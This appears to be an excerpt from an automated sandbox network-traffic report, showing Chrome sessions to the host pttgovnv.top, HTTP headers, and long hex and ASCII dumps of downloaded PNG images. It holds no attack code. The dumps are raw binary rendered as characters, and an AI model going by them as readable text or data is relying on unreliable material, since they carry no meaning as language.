c9 21 3d 43 78 47 f2 bc d9 90 18 f6 64 59 45 bb
          Data Ascii: ;I6WqJ%YmeNL5LIK/`.C?FB3v>im'K7I$lTgwMdYpDsbDK[}/+1z ;.-u%979c]s5/+zPRUI3.n|#MLSm/eo!=CxGdYE
          2024-09-01 22:25:27 UTC1369INData Raw: 3b dd 28 5c c1 66 44 b2 32 c7 44 ee f7 98 c8 45 25 89 d4 6a 1b 63 9d f3 bc ae 15 81 6b 7c f5 84 f7 eb d1 09 e1 5f 5c 79 e3 7d db 0e e5 1d 2b 47 e4 72 a2 71 6b 42 32 dc a8 57 bf 2b 4f d5 74 b1 7f ca 4d eb 82 c5 d9 5d ad d1 4b 77 bb 76 e3 10 81 02 0f 6b 67 6b b5 8c 22 24 6e 1d 70 fe d9 5d 8d a7 cf 18 d4 b6 e9 29 b2 48 3b 70 5c 10 7e ed de 81 ab 54 85 fe b8 46 bf 6e 5b 2d 4b dc 99 61 e5 7a 36 fa f0 17 fe 6c e0 33 f9 f2 56 48 e4 a6 a2 71 f4 1d 6b 48 e0 aa 35 0d 7e 00 22 57 34 5d d8 2e 50 83 ec 63 bf f1 7e 14 a1 80 c4 55 1d d1 28 dd 75 e9 92 71 99 2c a1 21 5f 26 72 3f a9 b5 ef 39 72 ec 33 f9 17 e9 9a 93 b8 db bf fc f2 33 9f d8 3b f8 72 31 f3 72 91 e3 91 53 59 22 d7 ad 81 d3 b4 9a 05 0e 22 b7 34 ba b1 5d a0 46 e1 91 5a 88 1c 24 ae ba b8 3c 6a c4 d2 19 7a cb 3a
          Data Ascii: ;(\fD2DE%jck|_\y}+GrqkB2W+OtM]Kwvkgk"$np])H;p\~TFn[-Kaz6l3VHqkH5~"W4].Pc~U(uq,!_&r?9r33;r1rSY""4]FZ$<jz:
          2024-09-01 22:25:27 UTC1369INData Raw: fd 68 d5 bd ba 25 0a 69 b0 f5 23 78 fd 6c 38 c8 86 1e f7 9e 70 a4 94 cb 47 d1 09 48 dc 4a e0 37 58 3f 13 a5 b0 fb f7 dd c9 84 fc 34 71 5b ba 8f c6 e5 f0 89 33 12 17 85 83 15 ea 99 a1 87 89 5c c6 15 39 7e 73 e6 51 b9 83 2b ad 90 b1 bd 55 51 72 f7 01 13 b9 f6 65 4a 5a db 23 0f 74 36 ce 23 5c bd 7c 7f f2 d7 17 2f 9a 9a 6d 53 d5 7d 6b 59 fb 91 57 8c 20 53 e9 b5 3d 4c e0 22 ae c0 3d c4 04 ae bf 02 c7 c5 91 9b e6 cd 3e 55 ad 93 53 64 aa c5 fa a7 d2 69 e9 a8 fb 9a bc 76 52 09 ae 54 5a 97 71 31 2c 65 14 ae 77 19 17 fb a1 12 3e ec a0 99 91 85 a9 74 d3 1e 5d 38 04 eb 52 e8 62 6c e8 2a b1 c8 41 e2 20 71 2b 92 38 5e c9 21 e4 f1 38 d1 38 c2 c6 d7 f3 b1 9e 16 23 af bf 29 87 96 7b 43 2b 05 3b 6e 3b 11 73 45 4e 75 45 2e 7b f1 1e 72 53 ac 4b c5 11 a8 a6 66 49 25 02 c9 2e
          Data Ascii: h%i#xl8pGHJ7X?4q[3\9~sQ+UQreJZ#t6#\|/mS}kYW S=L"=>USdivRTZq1,ew>t]8Rbl*A q+8^!88#){C+;n;sENuE.{rSKfI%.
          2024-09-01 22:25:27 UTC1369INData Raw: 2b 70 dc d3 f4 cd 9b 32 a1 0d cd 76 0b 3f 7f 22 13 d3 cd a9 f0 2e a9 8e 58 16 39 a2 e9 c2 8f e3 09 e1 ef 22 71 f1 e1 44 4a b8 c2 ce a7 eb f1 cb 04 25 a0 dc 4d 8d 40 e2 00 28 13 88 c4 b9 ec fe dc f3 df 5c e8 7d 9e e6 e2 b3 99 26 e1 35 36 9b 52 69 e2 53 14 b2 4f 91 a7 44 98 52 d2 c8 6e ba 9d 6c 20 5e 85 86 bc 1e f2 b3 9f 3d d2 f9 7f fe fa bd 03 df ad 80 c8 f5 33 a1 78 c8 15 35 32 4f 44 8e 90 02 51 b9 ed b7 3c 33 c4 a4 69 d6 4c bc 3f d5 d1 cb c6 9c f5 24 13 ba 59 cc f6 04 eb 0b 3f 2b bc 75 36 cd 53 89 ad 79 93 a7 a3 68 23 ff fe 81 4e 41 98 9b 82 e5 9c 3e a5 47 e2 b1 59 02 17 27 15 4c a3 1e fd 5f 37 3e 19 8b fb ba 2c 4b 38 c6 ce 05 de 3f eb 5b 24 a7 11 df 6b da d2 ef 17 45 fa a1 ec df a6 45 c8 95 28 fd f8 bd fb 06 50 f0 17 ac 3a bc a9 11 de 18 6b 19 d6 d3 99
          Data Ascii: +p2v?".X9"qDJ%M@(\}&56RiSODRnl ^=3x52ODQ<3iL?$Y?+u6Syh#NA>GY'L_7>,K8?[$kEE(P:k
          2024-09-01 22:25:27 UTC1369INData Raw: ad b5 dc b6 9b b2 51 38 9e 12 0d 15 23 72 d9 b4 ea a6 ad 33 6e d7 bc 41 4e 46 c2 a6 33 61 be ca 0d 01 bf 30 dd 53 c3 f8 b8 3d ab 9f 54 9e 46 dd b6 55 9e b5 fe b7 ce a6 23 13 13 3c 02 37 f7 fe de d2 e2 d1 db af f6 f2 ef 59 b4 80 69 09 8b 44 c6 33 23 5a d2 6c 65 f2 d6 c4 96 fa c0 07 ee 19 ec c5 59 04 d6 39 5d a4 84 ed 5c ae 56 39 3b 00 c0 e2 a0 4c 5c 6d 8a 1c 7f 8a e6 fd 74 1e 4a 26 a4 e0 f8 98 d2 34 11 f7 10 cb 14 46 97 b0 18 2e 50 bc 46 82 5e 48 e4 f2 cb c8 e5 d7 56 dd ba 75 76 73 20 85 2a 37 d4 07 84 e9 4a 0d 43 e7 8c 91 dc f7 ae da 2e cf 4a a3 0e 0d 67 22 f1 b8 3d 27 85 aa 78 04 72 dd 75 fe 70 db 55 8a 8f 09 9c 7f b1 2f 65 99 94 c4 c6 0d ed f4 89 64 78 64 28 45 52 09 93 47 2b 79 0a f6 9e 5f 81 c0 01 c0 e9 ae f2 e5 01 00 20 71 6b 5e e4 62 6c e0 17 4f a7
          Data Ascii: Q8#r3nANF3a0S=TFU#<7YiD3#ZleY9]\V9;L\mtJ&4F.PF^HVuvs *7JC.Jg"='xrupU/edxd(ERG+y_ qk^blO
          2024-09-01 22:25:27 UTC1369INData Raw: 25 fe 80 35 aa 78 ac 06 22 4c 4b 54 36 2a 27 e6 36 08 9c 6d 04 98 37 de cb 2b 37 34 04 83 24 c0 94 cf b4 08 89 27 68 83 28 90 78 73 a3 14 1a 1b b7 22 ba 4e 9b 45 36 a1 65 93 14 0e f8 85 90 e0 b6 32 c2 fb 54 9d 98 30 e3 f1 98 a5 08 7c 7d 6c 58 c2 d3 c5 d3 6c f8 d8 6f fc ce 40 4d fe c8 1b 9b 3c 09 76 7e f1 f2 84 7d f9 37 45 2e 6e 7c 9a 6d 91 4f 45 22 f6 cd e3 e3 f6 6f e1 92 05 4a 48 77 85 3f bf 16 a4 a5 77 95 57 d1 b7 0a bd 6b ac c6 77 6d 27 53 cd 89 ac 46 4d e5 7e fc 54 21 71 73 30 0d e1 f3 49 53 fe 45 5a 97 3e db d0 68 dc 77 f2 f0 b5 3c 1d c7 45 ee 60 a0 31 d4 ef de 54 83 ba 46 c3 5a 9a 86 6a e1 3b b1 ef d0 e8 fe 90 ba b2 3f aa d0 26 d2 41 a9 e0 54 6e c8 64 c4 51 c3 10 33 96 29 d4 51 3a 6f a5 80 e9 8a 10 82 20 f3 c8 5b 94 09 9d 28 08 4e 3a 33 9b f2 0c b3
          Data Ascii: %5x"LKT6*'6m7+74$'h(xs"NE6e2T0|}lXlo@M<v~}7E.n|mOE"oJHw?wWkwm'SFM~T!qs0ISEZ>hw<E`1TFZj;?&ATndQ3)Q:o [(N:3
          2024-09-01 22:25:27 UTC1369INData Raw: f7 ca 8f df c5 53 b8 7b a8 2d 6d a6 54 f0 e5 bc 35 5c 6b fb 8e 47 ee 44 d1 36 04 42 cd 4c 46 90 33 ba a5 fa bc 42 d2 b6 e9 5b 4c d6 e2 b6 45 62 a6 49 8c a4 45 5e 14 74 1e 65 13 48 36 95 2a b8 51 37 c7 e5 9c 69 53 ef 65 07 71 fa 35 9d 35 8d e4 bc 27 ba 05 ea 72 ff e6 f3 3b d3 4a d3 80 ce 0d 7c 60 cb 3f ff e2 f7 6f b8 c0 5e ff dd 4d 9f 7a a5 98 fe 68 c9 33 df b9 f1 1b a9 94 f7 93 a6 25 34 2e 74 7c d9 3e 51 ea ea ed ba e7 9f 4f f1 e6 46 86 55 ef 94 d9 d6 fb 51 a0 17 94 45 90 ba c8 d2 0a 8f 77 2d 73 fb b2 0f 46 00 2c 76 9e f4 a0 59 11 48 5c d1 f0 6e b5 14 9f f4 c7 fc 35 6f ee e2 d8 31 3d ac c8 16 d9 7a b5 31 1e 8e 7a 02 13 13 05 fb f1 9c 8e c2 ed f9 ea f1 25 9d 6c 37 7c ec 35 5e 78 dd 29 c0 7e f4 f1 8e 76 32 95 3e ed 22 8b 54 50 a8 8a 13 c6 43 89 2c 53 cd e3
          Data Ascii: S{-mT5\kGD6BLF3B[LEbIE^teH6*Q7iSeq55'r;J|`?o^Mzh3%4.t|>QOFUQEw-sF,vYH\n5o1=z1z%l7|5^x)~v2>"TPC,S


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          104192.168.2.449849104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:28 UTC361OUTGET /help/layout/images/48.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:28 UTC722INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:28 GMT
          Content-Type: image/png
          Content-Length: 27613
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"6bdd-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36237
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EwGuUrk%2BpgUr4FTDO%2BXoefyM3Poy1NwtSTTNreBpBgx66BQlATUWDWpcCd16zhCw0eccsFVYoMGS8YfRKMmfjMBXYHK0b99llw0bAWTJ3To9IFxy0MrquIpn5OPsRX4%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad266feb6a4f-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:28 UTC647INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 6b 6a 49 44 41 54 78 da ec fd 4d 76 1a 4b 13 70 0b e7 79 d7 db 17 a7 fd 35 84 5b b7 29 ce 08 84 47 60 3c 02 e3 11 18 8f c0 78 04 c6 23 30 1a c1 c1 23 70 69 04 46 cd af 65 d4 b8 ed 83 46 f0 5c 05 8a 14 41 2a b3 fe a8 82 02 ed bd 16 4b 36 82 fa c9 2a 94 9b c8 cc 88 bf fe f7 bf ff 39 00 00 00 00 38 2d fe 42 e2 00 00 00 00 90 38 00 00 00 00 40 e2 00 00 00 00 00 89 03 00 00 00 40 e2 00 00 00 00 00 89 03 00 00 00 00 24 0e 00 00 00 00 89 03 00 00 00 00 24 0e 00 00 00 00 90 38 00 00 00 00
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<kjIDATxMvKpy5[)G`<x#0#piFeF\A*K6*98-B8@@$$8
          2024-09-01 22:25:28 UTC1369INData Raw: a6 35 00 00 89 03 00 38 be 9c 0d 1f 7f fc 7a 7c dc 8b a4 e9 63 fe 28 6b 99 79 4d 4f 9f bf d0 a7 6e f5 35 f3 60 5b a3 c7 1f 93 c7 87 bc 77 f9 f8 fb 05 2d 0c 00 48 1c 00 40 75 41 13 c9 fa 60 9e ba 53 f9 9a 99 d7 88 70 5d 47 de 7e f3 f8 ba b1 be 46 c4 ec 5b e4 35 b2 bd a1 44 e7 22 a2 e7 54 0c 27 56 e6 f4 75 73 15 bd ec f1 77 4b ae 14 00 20 71 00 f0 9a 04 4d c4 4a 84 68 e0 b6 11 b4 c5 a3 14 ad 8c 2c fd 97 78 bb c8 d7 48 5e fb f8 3a 11 b5 1f 89 d7 49 c4 6d a4 ff 16 e9 ba 4a 89 9c fe 5b 84 ec 32 f2 9a 8f 3e 6a f7 b8 3f 11 ba 77 c1 3e 26 c8 1c 00 20 71 00 f0 1a 04 2e 4f d0 be 3e 0a d1 54 5f 27 e2 f4 21 f1 ba 07 f7 14 45 5b 16 88 9c 97 b4 9e 4a da 45 4c f6 1e b7 33 d4 79 73 59 e2 35 6f 65 88 36 22 71 fe 58 c6 3e 62 a7 e7 97 e9 ef e4 1c e6 cc c5 03 00 24 0e 00 4e
          Data Ascii: 58z|c(kyMOn5`[w-H@uA`Sp]G~F[5D"T'VuswK qMJh,xH^:ImJ[2>j?w>& q.O>T_'!E[JEL3ysY5oe6"qX>b$N
          2024-09-01 22:25:28 UTC1369INData Raw: 13 ed a7 11 45 91 52 3f ef 71 93 3e 46 17 32 dc 46 de 32 f4 d7 4e 12 0a 4b aa 12 e6 cb 01 20 71 00 70 1c 64 1e 9b 4c 7c 97 e2 f3 f7 39 af bb 6d 41 60 e6 1d 12 b9 b2 e7 36 ef c8 f1 fa d5 a3 7b 23 c2 a6 f3 1e 65 d5 6a df 0c 15 67 29 89 73 4f a5 c0 64 91 87 0c 35 67 88 1c c0 e9 f1 7f 69 02 80 d3 c0 24 e3 1d e8 63 e9 1f 3a d7 cd cf 77 1b b8 dd 42 f6 2b f7 94 df 6d d9 f0 f1 4c 5d 4e 52 e0 23 49 51 19 86 6e 77 d2 ff 31 b9 92 45 18 92 bc b7 21 99 cb 22 c2 fa 25 21 71 2b f3 dc 85 8a 5c 9f 54 24 00 a7 03 73 e2 00 4e 43 e0 44 98 8a ca 62 49 a4 6d 5e 25 e9 ed 1e c7 d3 57 11 92 e3 79 1b 91 87 43 cb ad 9c f3 bb 0a 6f 2b cc 29 77 80 e3 1e bb a7 b2 5a 32 fc d9 9a 3c 25 92 02 cb 4a 65 b9 86 61 fe c0 ef 5d 4f 80 0c 00 5b 18 4e 05 e8 be c0 49 a7 fa c5 15 4f da 97 a1 b1 f1
          Data Ascii: ER?q>F2F2NK qpdL|9mA`6{#ejg)sOd5gi$c:wB+mL]NR#IQnw1E!"%!q+\T$sNCDbIm^%WyCo+)wZ2<%Jea]O[NIO
          2024-09-01 22:25:28 UTC1369INData Raw: ae 90 b8 ca f8 36 96 f9 8f 93 12 f2 3f 75 db 4a 0a 5d 41 8e fb 77 c1 6b 2e f4 b8 27 5c 72 00 24 0e e0 14 04 4e c4 46 86 1f 2f 0b 5e 3a 3e 83 ce 4d 64 24 3b 52 1b f7 dc 6e 52 64 4f 6c b8 5a 90 68 50 28 cd 4b 7d 7e 7d 04 a1 96 79 6f c3 53 8d 52 69 34 ce 96 66 4b a5 18 19 21 71 00 48 1c c0 a9 08 9c 48 4d 99 55 a8 cb 53 3f 5f 11 10 4d 45 32 6f a1 2d fb 2a 64 f2 e8 eb 63 e0 aa 57 3e b0 bc cb d9 9f fc 78 d0 eb b2 d2 87 fc 7b d9 c2 5c 45 11 b7 d1 a9 0f 33 6a 69 b6 4d 5b e5 b4 d1 25 7f 19 00 90 38 80 53 60 58 42 32 44 14 86 5d 1c 4a ad d9 91 2f 55 e4 f6 11 36 5f 6e 6c a0 3f ab 96 f9 ba 73 05 2b 26 03 64 7f b1 5a b5 17 ba ef eb 88 e0 dd aa a0 cb 75 cb f6 14 b0 d9 19 5d ff 8c 8f 3d c0 71 a0 ec 16 40 83 14 94 a9 12 d1 58 68 07 be 2e b9 bd 89 2c 22 38 d3 b6 1a a9 b0
          Data Ascii: 6?uJ]Awk.'\r$NF/^:>Md$;RnRdOlZhP(K}~}yoSRi4fK!qHHMUS?_ME2o-*dcW>x{\E3jiM[%8S`XB2D]J/U6_nl?s+&dZu]=q@Xh.,"8
          2024-09-01 22:25:28 UTC1369INData Raw: 14 4d 0b da a2 a7 51 db 22 99 93 73 7f 63 ce 4f da fd 87 5c 07 15 c5 ae 88 9c e7 41 ef df 7e d9 c5 34 3a 37 f0 bb be cf b7 5b bf ee e7 08 00 89 03 80 32 02 67 65 26 c6 5d 51 67 9e e8 b8 a7 7b c8 5c 5b 02 37 55 61 f5 51 41 19 42 93 54 10 a3 32 c3 5c 3a 44 f8 5b 85 77 5c b1 4d 32 23 31 97 81 d4 6d 16 1f c8 71 3c fe f3 ef c7 c7 7b f7 b4 12 d6 33 ae 78 aa 83 12 cf cb 39 7c 71 bb 0b 2a 46 56 76 5d 3c b5 8a 45 c4 e5 39 62 98 27 b6 e6 fc de 9a ed c8 75 f8 b3 a7 a4 36 29 72 56 de a6 35 16 79 4c f4 7d 5e 9c af f8 2b 03 80 c4 01 b4 21 70 03 57 3c 77 48 44 62 58 77 68 b1 01 99 6b ea 5c 25 fa b6 54 69 f1 c2 2a 13 cd fb 15 73 79 d9 d7 96 19 1a eb 05 52 64 e7 93 7d 89 45 a1 b4 cd 16 c1 02 83 cb 8a a7 6c 65 6a 69 f6 7f 69 64 ec 26 90 97 7e 30 df 6d 1a 88 bc b0 32 e7 33
          Data Ascii: MQ"scO\A~4:7[2ge&]Qg{\[7UaQABT2\:D[w\M2#1mq<{3x9|q*FVv]<E9b'u6)rV5yL}^+!pW<wHDbXwhk\%Ti*syRd}Elejiid&~0m23
          2024-09-01 22:25:28 UTC1369INData Raw: af ea fe e7 6e 77 98 7c b8 6f d1 fa e0 dc e4 98 ff 6e a3 9e 6b 64 7f 61 c7 c4 70 2a 00 12 07 50 28 50 2b b7 3b 0f ee 56 3b fd 4c f3 9f b5 7d 0c 22 01 fd 16 05 6e 67 ae 95 19 0a dd 0c c3 a9 d0 e4 d5 08 8d 0e 9b 46 24 e2 79 38 50 9f 97 f7 ce eb 9c 97 9e 43 f8 b8 68 a1 f9 1f f4 5a 3f 3f f6 91 20 4d 9c ec 87 39 37 43 a9 91 f9 8e 3e b2 db 33 5f 20 3e 57 8c 4a da 7d 5a 71 6c 43 e4 56 4d 08 6f 0d 89 6b 6d 3e 1e 00 12 07 70 3e 22 37 52 e1 58 1e a2 b3 6a f9 5c 42 81 7b 11 dd 53 71 1d a8 44 4c f5 bc c7 39 db b4 12 72 e7 4c a5 8a ba 0b 14 12 b2 28 d7 61 a8 8f 22 61 bb 77 db a1 48 1b 65 8b 61 a3 75 b2 9f a2 1c 69 0f da 86 f2 58 54 89 1e 9a 05 1c 03 9d ac 6f 25 37 b6 9f 52 f3 e1 f4 9a f5 73 56 12 cb f5 fb d1 86 c8 1d f0 de 5d 05 d7 66 73 ef aa a4 f6 f4 3e 5d f0 17 0b
          Data Ascii: nw|onkdap*P(P+;V;L}"ngF$y8PChZ?? M97C>3_ >WJ}ZqlCVMokm>p>"7RXj\B{SqDL9rL(a"awHeauiXTo%7RsV]fs>]
          2024-09-01 22:25:28 UTC1369INData Raw: 7c 50 b9 e2 24 3e bb 00 4d c3 ea 54 78 6d cc 73 04 6e 13 15 e9 78 c7 35 32 02 77 93 10 38 2f aa fe 9c 92 51 1e ed d8 87 fa 3a a7 6d 93 57 31 a0 a7 79 cd 3e 05 d2 87 c0 55 40 db 6b a8 ed 27 7c 92 76 4d a4 07 f1 d7 48 2a 62 c8 d0 f6 34 21 70 59 20 70 3f cd 75 cd 34 0a 18 6e 5b ee 1f bf 92 f6 83 4a dd 29 08 dc d8 a5 d3 03 01 20 71 00 67 18 fd 18 26 a2 14 5e 76 86 25 e6 27 f5 8f 78 fc 7d b7 4d 0b 21 f3 e0 52 0b 0d 32 d3 c1 c9 90 9b c8 81 ac e4 5b 14 48 c2 83 db 2e 7c 88 ed 7f 53 02 c9 48 f0 8d 3b c1 ec ff 1d 12 39 df ee 37 46 a0 57 da ce e1 6b 65 c1 4d 74 55 6b e4 ba 08 df 75 68 d1 5f 4b b9 1f 16 89 dc 70 13 bd 9f 84 d9 91 ef f1 41 c9 97 c6 5e c7 7d 08 48 1c c0 19 33 49 c8 9b 44 38 ca e6 85 cb 2a 74 34 be 63 ea 35 94 58 75 6e e4 6c 94 c8 cc 3f 37 9d f9 77 ad
          Data Ascii: |P$>MTxmsnx52w8/Q:mW1y>U@k'|vMH*b4!pY p?u4n[J) qg&^v%'x}M!R2[H.|SH;97FWkeMtUkuh_KpA^}H3ID8*t4c5Xunl?7w
          2024-09-01 22:25:28 UTC1369INData Raw: b4 a3 f2 5c a0 60 9e df fb 63 0f 2f 6a 67 3e 09 64 d6 b7 e9 2c ec a0 23 b5 48 37 8b 4d 22 73 08 e5 75 df ba 72 9e 35 ee bf 7f fd f9 55 59 30 63 e6 0d 0e f4 67 58 7a 2e b5 68 66 ee b6 53 11 de d4 5c 28 61 b7 51 c4 83 7e 66 e6 15 b6 3f 74 2f 23 e3 7b cd 45 05 40 e2 00 ba d1 f1 89 00 fd 48 75 fe 15 3a 40 91 a4 77 35 0e a1 f2 bc b2 a2 8e 33 58 91 28 db 97 6d 8b 84 7d a9 b3 cf 40 00 3f 1f 3b 91 af 0e 75 86 f2 26 52 36 8e b4 85 8f 20 5e 97 10 12 7f 2f 08 b5 27 d1 1f b9 6d ac 84 46 cf d3 88 8d 17 b6 a1 2b 57 67 34 76 af 15 7e a1 28 10 f1 cc a5 6b 15 e7 71 ab 32 b7 2c b1 9f 50 e2 f6 5a 8c 01 80 c4 01 74 b3 03 94 3f ec 53 df b9 95 91 9c 84 50 54 a5 f4 f0 64 c9 28 dc b2 44 c7 28 fb 9c 16 09 59 d0 01 1e 55 6c 12 91 ce 07 95 b7 45 e2 d8 17 c1 b5 c9 4b c5 91 b9 ed 70
          Data Ascii: \`c/jg>d,#H7M"sur5UY0cgXz.hfS\(aQ~f?t/#{E@Hu:@w53X(m}@?;u&R6 ^/'mF+Wg4v~(kq2,PZt?SPTd(D(YUlEKp
          2024-09-01 22:25:28 UTC1369INData Raw: 4a 64 80 3c 98 13 07 67 8d 8a c0 54 3b 8c 5a 69 3b 0a b6 2f 1d 9d ac da ab 3d b7 cc 2c 68 a8 7c 7c 46 e6 6c 51 f8 e8 dc 3c 93 76 a1 52 c9 a6 63 08 9c be 7f 1e 48 aa 44 0f 07 25 12 bf fa d5 91 9b e8 dd a1 57 de 1e f1 5e cf 54 60 92 73 33 4d d4 6d ec e2 e5 e3 ee 54 d2 16 39 69 44 fc 75 d9 67 81 83 ff dc bc 69 52 8e 83 39 71 9b 76 30 73 f9 e4 dc 46 5d 95 71 80 3a 30 27 0e ce b9 53 1b 69 87 ee 73 84 7d d0 e1 b9 26 a3 20 d2 21 fc dc 43 e0 ac 7c cd 63 52 a2 73 de 24 fa b6 d2 c7 c0 ee 5f 85 48 3a c5 af 2e 31 7c a4 51 38 df 69 4f 0f d0 f6 29 81 bb 2d 29 70 23 f7 32 15 45 99 3a b4 13 3d 4f 3f cf 6d f8 8a 6e 79 7f 5d 2f c3 e4 c8 81 38 7d 71 2f ab 62 dc e8 17 11 91 e4 79 41 3b fb fb f4 a2 64 02 eb bc cf 4d d3 42 25 f7 9c 9f 3b 3a 36 d1 5c a7 f7 c4 d8 01 9c 11 44 e2
          Data Ascii: Jd<gT;Zi;/=,h||FlQ<vRcHD%W^T`s3MmT9iDugiR9qv0sF]q:0'Sis}& !C|cRs$_H:.1|Q8iO)-)p#2E:=O?mny]/8}q/byA;dMB%;:6\D
          2024-09-01 22:25:28 UTC1369INData Raw: f9 47 7a ec d2 e9 4f cd 22 8d 91 2b b7 18 c2 73 65 a4 e2 8b b6 97 97 8d b5 6f 4f 6d 9b b5 2b 51 f3 54 5f 1b 9b cf 37 69 a8 8d 64 de 9f 5c cb a5 ee 4b b6 bb 3e 40 d2 d9 85 91 b8 51 e4 5a c5 a4 eb 5e df 27 e5 ca 16 2a c5 ff 99 6d 64 91 cf 95 5c 07 49 35 32 e8 ca c2 01 3d 8e b1 11 fb ac e2 7d 06 80 c4 01 1c 31 f2 10 46 54 ba 54 04 db 96 cd ca 12 f2 70 ad e7 74 af 11 84 a5 76 44 cf 62 a7 72 92 4a bf 31 d4 9f 3f db 3a f7 20 89 b0 a5 b0 e8 b8 46 45 17 46 5a 87 2a 09 75 23 74 5e ec ae 23 c7 69 05 65 15 a9 58 31 4e dc 33 4d 88 7f a6 c7 94 e9 70 e5 95 db 16 97 6f 5b 64 64 ce a4 0c a9 be 4b 48 9c b4 bf cc 01 fc a9 c7 f9 22 ef 9d 6e c3 e7 9d 1b 46 f6 91 99 f6 1d b8 fc 85 12 c7 62 e6 e2 b9 23 01 90 38 80 8e 08 5c 3f 21 70 ce 95 c8 33 76 60 7c 67 78 97 f8 bd 15 91 4b
          Data Ascii: GzO"+seoOm+QT_7id\K>@QZ^'*md\I52=}1FTTptvDbrJ1?: FEFZ*u#t^#ieX1N3Mpo[ddKH"nFb#8\?!p3v`|gxK


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          105192.168.2.449850172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:28 UTC599OUTGET /help/layout/images/54.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:28 UTC728INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:28 GMT
          Content-Type: image/png
          Content-Length: 62332
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"f37c-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36237
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4A9KDdwYfOleNFa2ZfIUcuVMDIjNcenTdMGn5EajXpjpBrOcU%2FqIaGawQDZ0%2BCsP%2FKw5qVqJWFx30kBUl%2F%2BiSLZHotNTriyThIhA5BxyH11Pykg4dYsOscAVYkCVNmw%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad297eb68c6b-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:28 UTC641INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 f3 09 49 44 41 54 78 da ec 7d 07 98 5b c5 d5 f6 51 97 56 5a 69 7b ef 5e af 7b c7 15 57 6c aa e9 10 20 a1 27 24 21 05 02 04 7e c2 47 42 49 e0 4b a3 a5 00 5f 1a 21 09 bd 84 de 12 c0 06 8c b1 8d 8d 0b d8 06 b7 ed bd 57 75 e9 9f 33 77 46 ba 2b ef 7a b5 5e 6d f1 fa bc cf 23 6b 35 be ba f7 6a e6 dc 99 77 4e d5 04 83 41 20 10 08 04 02 81 40 20 1c 5b d0 52 17 10 08 04 02 81 40 20 10 89 23 10 08 04 02 81 40 20 10 89 23 10 08 04 02 81 40 20 10 89 23 10 08 04 02 81 40 20 12 47 20 10 08 04 02
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<IDATx}[QVZi{^{Wl '$!~GBIK_!Wu3wF+z^m#k5jwNA @ [R@ #@ #@ #@ G
